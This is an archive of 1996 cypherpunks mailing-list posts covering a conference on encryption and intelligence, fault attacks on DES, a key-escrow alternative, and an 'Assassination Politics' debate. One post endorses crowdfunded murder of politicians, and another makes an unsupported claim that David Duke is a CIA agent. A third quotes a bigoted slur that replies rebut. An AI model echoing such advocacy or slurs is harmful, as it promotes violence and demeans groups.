publicly maintained) and Internet security (which is doing the 
reverse).

He called for reasoned response to the new threats which did not 
commit expensive intelligence and law enforcement resources to 
combat the single hacker.  Proper threat assessing is important, 
and intelligence should be used to pinpoint the weak points.

Walter Pincus
National Security Affairs Reporter
The Washington Post

Mr. Pincus asked if (a lovely analogy to chicken little and 
osterages with their heads in the sand).  His most interesting 
remarks regarded the wisdom of dedicating such substantial 
resources to repell non-strategic efforts to disrupt networks.  
(Hackers, lone gunmen, etc.)  He questioned.  Doesn't, afterall, 
a strategic attack require much more preperation?  Should we 
really allow the personality of e.g., Louis Freeh, who has the 
capital dazzled from his glow, to direct these resources?

12:30 PM Luncheon
John Deutche
Director, Central Intelligence Agency
[Cancelled in the wake of the investigation into alleged CIA drug 
connections in California]

Part Two:
The Implications of a Changed World for a Set of Critical 
Decisions

2:00 PM  IV.  Protections Against New High Tech Dangers; Problems 
of Encryption, Information Warfare and Computer Theft

Stewart Baker:
Mr. Baker, considering what his position once was, was surprisingly
mellow.  There wasn't much warning for law enforcement, he commented.
Cryptography lends itself to criminal activity and subversive warfare.
It's hard to reherse attacks because you have to do it on real live
systems.

For defenses, he suggests the following:
1. Monitor and protect government systems.
2. Launch attacks, both on our systems and on others.  (!)
3. Take note that attacks on private systems are the most worrisome.
(Financial institutions, exchanges, utilities)

There is a manifest mistrust between government and private sector
business.  Private parties are unlikely to accept help from government.
The liklihood of government systems being adopted is slim.
Banks, for example, make high security expenditures and the choice of
system is best left up to them.  (!)

There are, however, market failures in the private sector.

1. No one in the private sector bothers to protect against a simutanious
attack on power and telephone service.  This is HIGHLY unlikely to happen
by chance, but by design it is almost certain to happen in an attack.

2. Reporting of incidents.  Incidents are rarely if ever reported by
private sector interests.  (Flight of funds on reporting, bank runs, lost
of customers all make reporting incidents difficult to justify).
Collection or REQUIRED disclosure, Mr. Baker argues, is required.

3. Some minimum recovery mechanism is required.  There is no independent
information system for private sector interests because there is very
little financial incentive to build one.  How will the civilian system be
recovered after an attack?

Lee Bollinger
Provost
Dartmouth College

Mr. Bollinger discussed 1st Amendment issues.  He had, however, a strange
take on the way they should be broken down.  Namely:

Pro Crypto: ITAR as prior restraint.  Yes the 1st Amendment is painful
sometimes.  So what?  This is the cost of a freedom of speech culture.

Anti Crypto: This is a foreign affaris matter.  Courts are not fit to make
analysis here.  This is not the pentagon.  It is "Technical" data and
therefore outside 1st Amendment scope.

Kate Martin
Director, Center for National Security Studies.

The Center for National Security Studies used to be a section of the
ACLU, but has since broken off and gone its own way.

Ms. Martin pointed out that the FBI shouldn't WANT to get involved in the
sources and methods problems that taking intelligence information would
present.  The confrontation clause will present problems for the FBI if it
gets information which fall under intelligence "Sources and methods" and
then tries to use it in court.  (Greymail - Where the defense calls for
sensitive records necessary to the defense and if they get a ruling in
favor of the discovery, the government either has to make national
security documents public or drop the charges).

She also pointed out that in the current draft of the anti-terrorist bill,
the FBI can "task" the CIA to make collections abroad.  The CIA could then
break into a foreign residence, and look for evidence, find evidence
implicating a previously unknown American citizen in e.g., drug smuggling.
The FBI could prosecute the evidence, which was obtained without warrant
and would constitute illegal search in the United States, and the U.S.
Citizen would have, under current 4th amendment standards, NO STANDING to
move for exclusion of the evidence found by the CIA.

Howard Shapiro
General Counsel
Federal Bureau of Investigation

Mr. Shapiro was quite slippery.  He spent most of his time dodging Ms.
Martin's barbs by indicating that the FBI tended to err in favor of
applying the constitution even in extraterratorial cases (Achille(?) Laro,
where the terrorists were read their rights even though outside of U.S.
Territorial Jursidiction) and the the FBI would respect limits even if not
required to.  Rather weak argument, quite well presented.

Suzanne Spaulding
General Counsel
U.S. Senate Select Committee on Intelligence

[Not Present - Ms. Spaulding was doing markup on the new Intel Bill (Since
signed) at the time, though she arrived later]

4:45 Adjournment

6:30 Reception and Dinner

Speaker Ernest R. May
Charles Warren Professor of History
The John F. Kennedy School of Government
Harvard University

[My associate and I were forced to miss this session]

Friday, September 20, 1996

8:00 AM Continental Breakfast

8:30 Overview
Philip B. Heymann

8:40 VI. New Uses for Intelligence as a Necessary Arm of U.S. Policy

Presentation:
R. James Woolsey
Shea & Gardner
Former Director of Central Intelligence

Mr. Woolsey made some very interesting comments.  He called rather
passionately for "Key Escrow," more potent funding for "DigiTel" but also
suggested that perhaps the dictator that was using modern encryption
"might not be hiding as much as he thinks he is."

10:15 AM  VII.  Law Enforcement and Intelligence

* Can Intelligence Technical Capabilities Better Support Law Enforcement
Objectives: What are the Legal and Practical Limits?
* Should Covert Action and Technical Intelligence Gathering be Available
to Law Enforcement?
* Rethinking Jurisdicitonal Lines, Roles and Responsibilites: Are New
Structures Required?
* The Law Enforcement and Intelligence Relationship; Past, Present and
Future.
* Can Common Standards be Achieved for Collection and Oversight?

Moderator: The Honorable John H. Shenefield
Morgan, Lewis & Bockius

(Introductions and short statements only)

Presentations:
Mark M. Richard
Deputy Assistant Attorney General
Criminal Division
U.S. Department of Justice

Mostly discussion of anti-drug efforts but a few interesting comments:

Internet banking is on the radar screen and there may soon be an
entirely seperate department of DoJ which addresses internet banking
crime.  DoJ is clearly leading the effort here.  Intelligence agencies
less so.

Jeffrey H. Smith
General Counsel
Central Intelligence Agency
(Soon to return to Arnold and Porter)

A few rather vague quesitons came up about anonymous transactions and
internet came up.  The Attorney general "is putting together structures to
attack that."  Rather ominous.

Michael A. Vatis
Associate Deputy Attorney General
Office of the Deputy Attorney General
U.S. Department of Justice

Vatis is a young shining star in Justice, a Gorelick protege and likely to
be the most dangerous individual to cypherpunks in the coming years if he
stays with justice.  Vatis understands remailers, encryption, PGP, even
mentioned "mixmaster" and so forth specificlly.  He is sly, knows just
when to shut up and is probably the front man on the DoJ attempt to attack
remailers and anonymous communications in general.  He is a real problem
for cypherpunks and the party is clearly over.

Jonathan M. Winer
Deputy Assistant Secretary of State for International Narcotics and Law
Enforcement Affaris

Winer's points of interest to the list were money laundering related.  The
tactic, he indicated, is to get foreign governments to adopt legislation
to make money launderers move elsewhere.  (The carrot and the stick
approach is used).  He did acknowledge the need for money laundering in
the intelligence community, and urged, vaguely, for cooperation as money
launding regulation "is an increasingly important priority."

He discussed, vaguely, the CIA "tasking" issues brough up by Ms. Martin.

11:45 AM  Luncheon
Speaker:
Jamie S. Gorelick
Deputy Attorney General of the United States

Ms. Gorelick most tooted everyone's horn for the increasing cooperation
that between the various communities.

-end-

--
I hate lightning - finger for public key - Vote Monarchist
unicorn@schloss.li








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Black Unicorn <unicorn@schloss.li>
Date: Sat, 19 Oct 1996 15:48:34 -0700 (PDT)
To: "Dr.Dimitri Vulis KOTM" <dlv@bwalk.dm.com>
Subject: Re: [SERDAR ARGIC] Ray Arachelian's role in the genocide of 2,500,000 moslems
In-Reply-To: <HDq2VD6w165w@bwalk.dm.com>
Message-ID: <Pine.SUN.3.94.961019184704.19884V-100000@polaris>
MIME-Version: 1.0
Content-Type: text/plain



I'm I the only one who is sick of Vulis' trash?

--
I hate lightning - finger for public key - Vote Monarchist
unicorn@schloss.li





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: azur@netcom.com (Steve Schear)
Date: Sat, 19 Oct 1996 18:29:53 -0700 (PDT)
To: Clint Barnett <cbarnett@eciad.bc.ca>
Subject: Re: NSA/GCSB spying shown on NZ television [RANT]
Message-ID: <v02130501ae8e900fcb9a@[10.0.2.15]>
MIME-Version: 1.0
Content-Type: text/plain


>clint barnett wrote:
[snip]
>If you think that you
>can resist the NSA and win, more power to you, and I'll help if I can, but
>I don't think you can.However, I strongly believe that you have the power
>to limit the information they steal from you, and thereby limit the
>control they have over you. If you can keep your wits about you, act fast
>when you have to, and run away to fight another day, then you can maybe
>do some good, but don't make a martyr of yourself or anyone else, because
>martyrs can't write code, they can't attack or defend a system, they can
>only lay there and rot in jail or in the ground.
>

To paraphrase Gen. George S. Patton, "No dumb bastard ever won by dying for
his cause, he won by making the other poor dumb bastard die for his."




PGP Fingerprint: FE 90 1A 95 9D EA 8D 61  81 2E CC A9 A4 4A FB A9
---------------------------------------------------------------------
Snoop Daty Data           | Internet: azur@netcom.com
Grinder                   |
Sacred Cow Meat Co.       |
---------------------------------------------------------------------

Counter-cultural technology development our specialty.

Vote Libertarian.

Just say NO to prescription DRUGS.

"Of all tyrannies, a tyranny sincerely exercised for
 the good of its victims may be the most oppressive."
    -- C.S. Lewis

"Surveillence is ultimately just another form of media, and thus, potential
entertainment."
    -- G. Beato






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: azur@netcom.com (Steve Schear)
Date: Sat, 19 Oct 1996 19:32:08 -0700 (PDT)
To: John Gilmore <gnu@toad.com>
Subject: Re: IP: - Biham/Shamir Differential Fault Analysis of DES, etc
Message-ID: <v02130502ae8e916a1cfb@[10.0.2.15]>
MIME-Version: 1.0
Content-Type: text/plain


>Note that this attack requires physical access to the DES chip, to
>stress it so it will fail.  It works great against "tamper-proof"
>devices such as smart cards.  It doesn't work against encryption
>happening at any distance from the attacker (e.g. across the network).
>It doesn't work against stored information like PGP-encrypted
>email messages either.
>
>However, it might be possible to use the attack by beaming disruptive
>energies (heat, electrons, microwaves, etc) at a computer which is
>doing a lot of encryption, while simultaneously monitoring that
>computer's activity across a network.
>
>        John

Although using physical/electrical attacks to cause circuit disruptions to
ICs (like smartcard) may be feasible, it appears to be much more difficult
to mount this sort of attack on specially hardened crypto modules, which
can more effectively isolate themselves from invasive sources or detect
them and take action (i.e., key clearance) before an attacker can pry out
their secrets.







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dustman@athensnet.com (Anonymous)
Date: Sat, 19 Oct 1996 17:48:27 -0700 (PDT)
To: cypherpunks@toad.com
Subject: Re: [PGP] Re: FYI - Biham/Shamir Differential Fault Analysis of DES, etc.
In-Reply-To: <199610190449.WAA06334@zifi.genetics.utah.edu>
Message-ID: <199610200035.UAA11609@porky.athensnet.com>
MIME-Version: 1.0
Content-Type: text/plain


> As usual, Blaze/AT&T uses cypherpunks to spread FUD from it's NSA masters.
> This time, however, he's stolen the work of others and twisted it to suit
> the corporate goals. Bet his next message is a commercial from AT&T for the
> clipper chip, which, they will ass-u-re us, fixes this socalled <<attack>>.
> Someone should sue Blaze and AT&T.

How much of a bonus do you think he got for exposing the flaw in the
clipper chip?

> Blaze, who is a wellknown homosexual Jew, probably can expect a nice bonus
> in next weeks blood money check for thinking of this latest little stunt,
> so I'm sure he can afford the legal fees. Just a cost of doing biz, right?

Is there anything wrong with being a homosexual Jew?  Can you
elaborate?

> Shame on him!
> 
> p.S. I know this post sounds angry but this kind of shit just pisses me off
> so much.

Exactly what pisses you off?

The message Blase posted implies that there are serious problems with
making "tamperproof" devices.  This sounds like good news to me, as it
makes it significantly harder for the government to realy on the
secrecy of encryption keys for "LEAF" packets.

If you think there is something incorrect or dishonest about the
announcement Blaze forwarded, I'd like to hear about it.  However, I'm
trying to follow your logic but can't figure it out.  You claim:

  1.  Blaze stole the work of others.

How can this be since he clearly attributed the message to
Biham/Shamir

  2.  He's twisted the work to fit his corporate needs.

How does discrediting tamper-proof hardware fit the needs of AT&T?

  3.  Blaze is about to endorse the clipper chip in his next message.

Why would Blaze endorse a system he has already shown is flawed?
Anyway, since he hasn't endorsed the clipper chip yet, why can't we
wait and see what he does before attacking him?





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Ray <liberty@gate.net>
Date: Sat, 19 Oct 1996 17:54:02 -0700 (PDT)
To: cypherpunks@toad.com
Subject: [NOISE] Re: Q.E.D. reply to petty MESSger
Message-ID: <199610200115.VAA228088@osceola.gate.net>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

Mime-Version: 1.0
Content-Type: text/plain
Content-Transfer-Encoding: 7bit

To: cypherpunks@toad.com
Date: Sat Oct 19 21:13:00 1996
Don Wood writes:

...

>  ... I headed the OTP group at NSA, ...

...

For those of you also on fight-censorship, I hereby rest my case regarding 
deficiencies in the NSA's hiring practices. :)
JMR


One of the "legitimate concerns of law enforcement" seems to be
that I was born innocent until proven guilty and not the other
way around. -- me

Defeat the Duopoly! Vote Harry & Jo http://www.HarryBrowne96.org/
___________________________________________________________________
PGP id.E9BD6D35 51 5D A2 C3 92 2C 56 BE  53 2D 9C A1 B3 50 C9 C8
I will generate a new (and bigger) PGP key-pair on election night.
<mailto:jmr@shopmiami.com> http://www.shopmiami.com/prs/jimray
___________________________________________________________________

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMml8oW1lp8bpvW01AQFP3AQArzx/eUWKl4Pc9l3YWk4CUIqtWlPQoo6v
vi+F6KXi+VUTKgkSJAW8GZWgFrk3cJxrJVJnESCC0WPwzaEiMmDvW0y2bRhxSxX5
XYuIBMmMDM2j+eYddwI0ip8uiBUSTvPu23m5hBKmEsBv5+8CsJ13xhwXD+g+2Rtm
sAEO3P5xtfo=
=fWFy
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: C Kuethe <ckuethe@gpu.srv.ualberta.ca>
Date: Sat, 19 Oct 1996 19:52:00 -0700 (PDT)
To: Anonymous <nobody@zifi.genetics.utah.edu>
Subject: Re: [PGP] Re: FYI - Biham/Shamir Differential Fault Analysis of DES, etc.
In-Reply-To: <199610190449.WAA06334@zifi.genetics.utah.edu>
Message-ID: <Pine.A32.3.93.961019210857.28954A-100000@gpu3.srv.ualberta.ca>
MIME-Version: 1.0
Content-Type: text/plain


On Fri, 18 Oct 1996, Anonymous wrote:

> As usual, Blaze/AT&T uses cypherpunks to spread FUD from it's NSA masters.
> This time, however, he's stolen the work of others and twisted it to suit
> the corporate goals. Bet his next message is a commercial from AT&T for the
> clipper chip, which, they will ass-u-re us, fixes this socalled <<attack>>.
> Someone should sue Blaze and AT&T.
> 
>[SNIP] <argumentum ad hominem>
> 
> Shame on him!

Glad to see you're smart enough to not likle clipper.  And if  you don't
like DES, don't use it.  I don't.  anyway enough of my naive comments, but
please refrain from describing to us the perversities of others... I
firmly hold that cryptology has nothing to do with your favored religion
or other *PERSONAL* decisions.


--
Chris Kuethe <ckuethe@gpu.srv.ualberta.ca> LPGV Electronics and Controls

RSA in 3 lines of PERL:
#!/bin/perl -sp0777i<X+d*lMLa^*lN%0]dsXx++lMlN/dsM0<j]dsj
$/=unpack('H*',$_);$_=`echo 16dio\U$k"SK$/SM$n\EsN0p[lN*1
lK[d2%Sa2/d0$^Ixp"|dc`;s/\W//g;$_=pack('H*',/((..)*)$/)





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Dale Thorn <dthorn@gte.net>
Date: Sat, 19 Oct 1996 21:17:15 -0700 (PDT)
To: Blanc Weber <blancw@microsoft.com>
Subject: Re: Goodbye [NOSTALGIA]
In-Reply-To: <c=US%a=_%p=msft%l=RED-81-MSG-961018183217Z-2754@mail.microsoft.com>
Message-ID: <3269ACC4.53A3@gte.net>
MIME-Version: 1.0
Content-Type: text/plain


Blanc Weber wrote:
> From:   James A. Donald
> The glory days are long past, and cannot be revived
> by forming a new mailing list.

C'mon now, you guys sound like a bunch of old men, groaning over the checkers board 
about how you can't keep track of the six or seven medications you take every day.

Some amazing and true facts:  I'm 50 years old, learning Windows programming (yuk!), and 
actually, never went to college, but make good money writing code and also teach other 
programmers certain techniques....  I can also run a mile in six minutes, and haven't 
missed a day of work since 1975.

People die, things die, so what.  There are so many things to do, and not enough people 
to do them.  Get busy and you'll feel better.

> I've never thought of the cypherpunks as being of the mind to "abandon"
> the "worthless" masses to their own devices.   Rather, I thought of them
> as being of the mind to associate among those who thought like
> themselves about privacy, who shared the values of self-reliance, who
> supported the ideals of individual liberty, and who were open to
> including on the list anyone who wanted to better understand the
> subjects which are discussed there.

Don't expect anything to be static.  The "right kind" of talented people will find the 
other like-mind folks, on this list or elsewhere.  It doesn't need to be managed or 
bemoaned.

> But that quote above reminds me of the patent office's statement, often
> recounted, of how everything which could be invented had already been
> invented, and there couldn't possibly be any more new ideas introduced.
> It all depends, as usual, on the individuals involved -  on the quality
> they bring to the subject, to the list, to the enterprise.

True invention as a concept is controversial.  One could make a valid argument that 
"new" inventions, while not new in every way, or even in a way that has agreed-upon 
significance, are nonetheless as inventive in many cases as the great ones like the 
telephone, the laser, or the public key concept. Perhaps you could analogize judgement 
of a particular invention to judgement of a person's intelligence - no clear, concise 
table of numbers to work from.

> Interesting question:  what do elite sophisticates *do*, once they've
> reached their pinnacle?

"Pinnacle" appears to be another (possibly flawed) judgement, usually be persons who 
don't fully understand the methods and motivations of individuals who have "great" 
minds.

There's a scene in the old Star Trek, in one of the very first episodes, when Gary 
somebody-or-other starts getting a *lot* smarter after passing through a barrier at the 
edge of the galaxy.  Kirk walks into the sick bay, and seeing Gary(?) reading some 
really deep stuff on the computer, says something to the effect "I never knew you got 
into person xxx, etc.", to which Gary replies "actually, he's kind of simple once you do 
get into him, childlike, even."

My suggestion is, learn to be more like that (you can, actually), and save the nostalgia 
for appropriate situations.  Don't put yourself down with all that hero-worship.  That's 
for kids.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: ichudov@algebra.com (Igor Chudov @ home)
Date: Sat, 19 Oct 1996 19:48:58 -0700 (PDT)
To: nobody@cypherpunks.ca (John Anonymous MacDonald)
Subject: Re: FWD: Binding crypto
In-Reply-To: <199610192303.QAA11812@abraham.cs.berkeley.edu>
Message-ID: <199610200253.VAA03170@manifold.algebra.com>
MIME-Version: 1.0
Content-Type: text


see below...


John Anonymous MacDonald wrote:
> 
> 
> FORWARDED MESSAGE
> 
> =++=++=++=++=++=++=++=++=++=++=++=++=++=++=++=++=++=++=++=++=++=++=+=
> 
> 
> In this message, we introduce binding cryptography, a new proposal for
> establishing an information security infrastructure that does not
> hamper law enforcement. We present an alternative that can give
> law-enforcement agencies access to session keys, without users having
> to deposit private keys. Unilateral fraud in this scheme is easily
> detectible. We outline the proposal below, and announce two articles
> which will describe the proposal in more detail and which will provide
> the legal and the technical context.

 
> Metaphorically speaking, our solution consists of equipping public-key
> encryption systems used for confidentiality with a (car) governor (a
> speed-limiting device). The specifications of this governor are rather
> general, and so many systems can probably be equipped with them. It is
> inspired by the proposal of Bellare and Rivest [BR], in which users'
> encrypted messages consist of three components:
> 1. the (actual) message encrypted with any symmetric system, using a random session
> key; 
> 2. the session key encrypted with the public key(s) of the addressee(s);
> 3. the session key encrypted with the public key of a Trusted Retrieval Party (TRP).

> In effect, the TRP is treated as a virtual addressee, although the
> message is not sent to it. When a law-enforcement agency is conducting
> a lawful intercept and strikes upon an enciphered message, they take
> the third information component to the TRP. If shown an appropriate
> warrant, the TRP decrypts the information component and hands over the
> session key, so that the law-enforcement agency has access to the
> message. Observe that users are not obliged to escrow their (master)
> keys, they only give access to the (temporary) session keys used in
> the communication. The concept of "virtual escrow" has been the base
> of several escrow products (AT&T Crypto, RSA Secure, TIS Commercial
> Key Escrow).
> 
> The main drawback of this concept is that it offers no possibility, at
> least for others than the TRP, to check whether the third component
> actually contains the (right) session key; moreover, the TRP will only
> discover fraud after a lawful wiretap. This renders the solution
> almost entirely unenforceable.
> 
> Therefore, we propose a binding alternative, which adds a fourth
> component to the encrypted message: 
> 4. binding data.
> 
> The idea is that any third party, e.g., a network or service provider,
> who has access to components 2, 3 and 4 (but not to any additional
> secret information) can: 
> a. check whether the session keys in components 2 and 3 coincide; 
> b. not determine any information on the actual session key.

What prevents me from superenciphering the body of the message?

That would render the whole "fraud prevention" useless, wouldn't it?

thanks

igor
 
> In this way, fraud is easily detectible: a sender that attempts to
> virtually address a session key to the TRP (component 3) that is
> different from the real one he uses on the message (or just nonsense)
> will be discovered by anyone checking the binding data. If such
> checking happens regularly, fraud can be properly discouraged and
> punished. The binding concept supports the virtual addressing of
> session keys to several TRPs (or none for that matter), for instance,
> one to a TRP in the country of the sender and one in the country of
> the addressee. The solution therefore offers the same advantage for
> worldwide usability as the Royal Holloway [Holl] concept. We also
> remark that the concept supports the use of controllable key splitting
> in the sense of Micali [Mica] as well: a sender can split the session
> key and virtually address all the shares separately to the addressee
> and various TRPs using the binding concept. Moreover, the number of
> shares and the TRPs can - in principle - be chosen freely by each
> user. Finally we remark that the time-boundedness conditon (the
> enforceability of the timelimits of a warrant) can be fulfilled by
> additionally demanding that encrypted information (or all components)
> be timestamped and signed by the sender; a condition that can be
> publicly verified by any third party (e.g., monitor) as well.
> 
> A PKI that incorporates binding data hence has the following four
> players: 
> - Users, i.e., governments, businesses, and citizens, 
> - TTPs offering trusted services (e.g., time-stamping and certification of
> public keys), 
> - TRPs aiding law-enforcement agencies with decrypting legally intercepted messages, 
> - Monitors, monitoring communications encrypted via the PKI on compliance with 
> binding regulations. For instance, these could be network operators or (Internet) service
> providers.
> 
> In [VKT], we explain how we envision the framework in which the
> binding concept could present a security tool in the information
> society. We think the concept is flexible enough (e.g., in the choice
> of TRPs) to be incorporated into almost any national crypto policy, on
> both the domestic and foreign use of cryptography.
> 
> In a mathematical paper [VT], Verheul and Van Tilborg propose a
> technical construction for binding data for an important public-key
> encryption system: ElGamal. This construction is compatible with
> Desmedt's [DESM] traceable variant of ElGamal. The construction is
> based on the techniques used in zero knowledge proofs. We expect that
> these constructions can be improved and that various other public-key
> encryption systems can be equipped with binding data. We present this
> as a challenge to the cryptographic research community.
> 
> An outline of the mathematical construction of binding ElGamal can be
> found at http://cwis.kub.nl/~frw/people/koops/bindtech.htm.
> 
> 
> _3. References_
> 
> [BR]	
> M. Bellare, R.L. Rivest, "Translucent Cryptography. An Alternative to
> Key Escrow, and its Implementation via Fractional Oblivious Transfer",
> see http://theory.lcs.mit.edu/~rivest
> 
> [Desm]	
> Y. Desmedt, "Securing Traceability of Ciphertexts - Towards a Secure
> Key Escrow System", Advances in Cryptology - EUROCRYPT'95 Proceedings,
> Springer-Verlag, 1995, pp.147-157.
> 
> [Holl]
> N. Jefferies, C. Mitchell, M. Walker, "A Proposed Architecture for
> Trusted Third Party Services", Royal Holloway, University of London,
> see http://platon.cs.rhbnc.ac.uk
> 
> [Mica]
> S. Micali, "Fair Public-key Cryptosystems'", Advances in Cryptology -
> CRYPTO '92 Proceedings, Springer-Verlag, 1993, pp. 113-138.
> 
> [VKT]
> E. Verheul, B.J. Koops, H.C.A. van Tilborg, "Binding Cryptography. A
> fraud-detectible alternative to key-escrow solutions", Computer Law
> and Security Report, January-February 1997, to appear. [*]
> 
> [VT]
> E. Verheul, H.C.A. van Tilborg, "Binding ElGamal. A fraud-detectible
> alternative to key-escrow solutions", will be submitted to
> Eurocrypt97.
> 
> [*] For the Computer Law and Security Report, send subscription
> enquiries, orders and payments to:
> 
> Pam Purvey
> The Oxford Fulfilment Centre
> PO Box 800, Kidlington
> Oxford 0X5 1DX  UK
> Tel: +44 1865 843373
> Fax: +44 1865 843940
> 
> For the United States:
> Elsevier Advanced Technology
> Fulfilment (enquiries)
> 660 White Plains Road, Tarrytown
> New York, NY 10591-5153
> USA 
> Tel: 914 333 2458
> 
> ---------------------------------------------------------------------
> Bert-Jaap Koops                         tel     +31 13 466 8101
> Center for Law, Administration and      facs    +31 13 466 8149
> Informatization, Tilburg University     e-mail  E.J.Koops@kub.nl
>                   --------------------------------------------------
> Postbus 90153    |  This world's just mad enough to have been made  |
> 5000 LE Tilburg  |    by the Being his beings into being prayed.    |
> The Netherlands  |                (Howard Nemerov)                  |
> ---------------------------------------------------------------------
>          http://cwis.kub.nl/~frw/people/koops/bertjaap.htm
> ---------------------------------------------------------------------
> 
> --
> " The way to combat noxious ideas is with other ideas.  
>   The way to combat falsehoods is with truth. " 
> 
> 	-- Justice William O. Douglas, 1958
> 
> 
> 



	- Igor.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Dale Thorn <dthorn@gte.net>
Date: Sat, 19 Oct 1996 22:08:30 -0700 (PDT)
To: jimbell@pacifier.com
Subject: Re: is there no end to Murder Politics & Creative Wiretap Arguments? [RANT]
In-Reply-To: <9610191814.AA31571@etna.ai.mit.edu>
Message-ID: <3269B83C.4105@gte.net>
MIME-Version: 1.0
Content-Type: text/plain


hallam@ai.mit.edu wrote:
> >Actually, no.  AP "stacks the deck" dramatically against those few who
> >engage in war crimes.  People from all sides of a dispute who object to them
> >can donate, and anybody considering participating in war crimes has to keep
> >this absolutely secret.

> You hve absolutely no idea of what is happening in Bosnia. There is
> widespread support in each of the communities for genocide policies.

This is exactly why the hell *we* shouldn't be in Bosnia.

> You do not demonstrate any reason why people would be more interested
> in murdering politicians than other people.

Very simple explanation. You go to that much trouble (murder) when you *really* need to 
get some SOB or parasite off of your back.  I'm still not sure BTW how to relate to the 
betting pools, etc., as a (relatively) healthy market-driven instrument.

> You assume that contract murderers do not have political or social
> agendas of their own. A member of the KKK is much more likely to
> become a contract killer than a liberal.

If you're talking about the "new" KKK (a la David Duke), forget it.  Duke was and is a 
CIA agent, from his missions in SE Asia for his father circa late 1960's. It's amazing 
how much of this media hooey sticks in people's brains.  Did you know that the largest 
contingents of KKK members of all time, by far (50,000 per city), were in Akron and 
Columbus, Ohio?  And where the KKK originated, in SE Tennessee (about a mile from where 
I worked for four years), is also where one of the greatest events for freedom ever took 
place - an armed uprising of the citizenry with its sole purpose to get an honest vote 
count for local sheriff, which they did. It'd be nice to get a public vote count today.

As far as contract killers with an agenda of their own, Joey the Hit Man (a real person, 
and very scary) says that professional killers very rarely kill for personal reasons 
outside of getting paid.  Just don't do something stupid like John Gotti's next-door 
neighbor did, and backing out of your driveway, accidentally back over Gotti's daughter 
and kill her.

> >How long do you think that such groups would last with AP functional?

> Murder Politics (lets give your psychopathic scheme an acurate name)
> will never be functional. If anonymous cash implied muder politics then
> society would be right to reject anonymous cash. It is easily done
> since money only has value so long as it is convertable.

This in some ways is the most crucial question in these rants.  Are you saying that 
society can really reject digital cash?  That it will go away completely when this 
society says it should?  I guess I'm to assume here that the "secret" agencies will 
maintain use of such cash for their purposes, while *preventing* the rest of us from 
using it somehow.

> Not only are rights dependent on a social infrastructure that
> guarantees that they will be respected but currency is as well.
> Without the social and political infrastructure of the US
> government a dollar bill has only the value of the paper its
> printed on. An electronic balance has zero value.

Can I assume that since the Internet is global, that e-cash will be too?

> If you want to live in a society where the political system has been
> "reformed" through murder of inconvenient politicians then go and
> live in Columbia. Its the nearest thing you will find on the planet
> to libertopia.

A lot of people make disparaging remarks about "third world" countries, where you have 
to bribe everyone to get anywhere. But can these ranters really claim that the U.S. is 
any different when it comes down to serious issues?  Try attending some city council 
meetings, with the intention to "make a difference", and you'll see what I mean.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Jean-Francois Avon" <jf_avon@citenet.net>
Date: Sat, 19 Oct 1996 18:59:26 -0700 (PDT)
To: cypherpunks@toad.com
Subject: Re: is there no end to Murder Politics & Creative Wiretap
Message-ID: <9610200233.AB17514@cti02.citenet.net>
MIME-Version: 1.0
Content-Type: text/plain


On 19 Oct 96 at 15:08, jim bell wrote:

> >At 02:14 PM 10/19/96 -0400, hallam@ai.mit.edu wrote:

> >>Murder Politics (lets give your psychopathic scheme an acurate name)

to assasinate = to commit murder : the previous term was accurate...
Why nitpick?

> >>will never be functional. If anonymous cash implied muder politics then
> >>society would be right to reject anonymous cash.

The thing is, *how* exactly are you gonna prevent the advent of e-cash?  The 
same mechanisms that will make a group try to prevent it's apparition will work 
for groups that try to promote it.  Prostitution was virtually always 
repressed.  But was it ever eradicated?  Only, the odds are immensely stacked 
in favour of AP as long as *any* kind of e-$ exists.  Doesn't even have to be 
denominated in dollar, donations could very well be made in ounces of gold...


> >>It is easily done
> >>since money only has value so long as it is convertable. 
> >>
> >>Not only are rights dependent on a social infrastructure that
> >>guarantees that they will be respected but currency is as well.
> >>Without the social and political infrastructure of the US 
> >>government a dollar bill has only the value of the paper its 
> >>printed on. An electronic balance has zero value. 

Well, let's get into that passionnate topic... Many peoples pretend that theses 
pieces of paper are worth nothing *right now*.

But what about gold e-bonds?  You don't like gold? OK, what about a composite 
of precious metals, patented antibiotics, some choosen chemicals, some choosen stock, 
etc, all of them *privately owned* by the issuing bank?

:-) ROTFL!

> >>If you want to live in a society where the political system has been
> >>"reformed" through murder of inconvenient politicians then go and
> >>live in Columbia. Its the nearest thing you will find on the planet
> >>to libertopia.
> >
> >No, not nearly enough politicians have been killed in Columbia to result in a
> >society that could best be described as an "anarchy."

While some peoples want anarchy, I jsut want peaceful living...

The example of Columbia is completely out of context.  Some dictators were 
replaced by other dictators, both being different sides of the same coin.

In Columbia, any member of the gang of drug cartels could be identified and
get targeted by peaceful citizens the same way they would target politicians. 
AP would thus stop street terror.  AP is not against govt per se, it is
something acting against any opressing "leadership", whomever it might be.  

Jim Bell's conviction being that the human animal is basically a reasonnable
animal that enjoys life, AP, IHHO, will bring a world in which the golden rule
will be "live and let live (or die).... or get killed".  

Here, "live and let live (or die)" is opposed to "live and make die (or live)" 
The operative is *let* versus what we currently have now: "make"

Jim Bell, as it is evident by his writings, believe that the word "freedom"
means "to be free from other men".  In that sense, an I think that I am quoting 
him, he claims that anarchy is not "the lack of order" but rather the "lack of 
orders".

jfa
Jean-Francois Avon, Pierrefonds (Montreal) QC Canada
 DePompadour, Societe d'Importation Ltee
    Finest Limoges porcelain and crystal
 JFA Technologies, R&D consultants
    physicists and engineers, LabView programing
PGP keys at: http://w3.citenet.net/users/jf_avon
ID# C58ADD0D : 529645E8205A8A5E F87CC86FAEFEF891 
ID# 5B51964D : 152ACCBCD4A481B0 254011193237822C 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Raymond Mereniuk <raymond@advcable.com>
Date: Sat, 19 Oct 1996 23:26:56 -0700 (PDT)
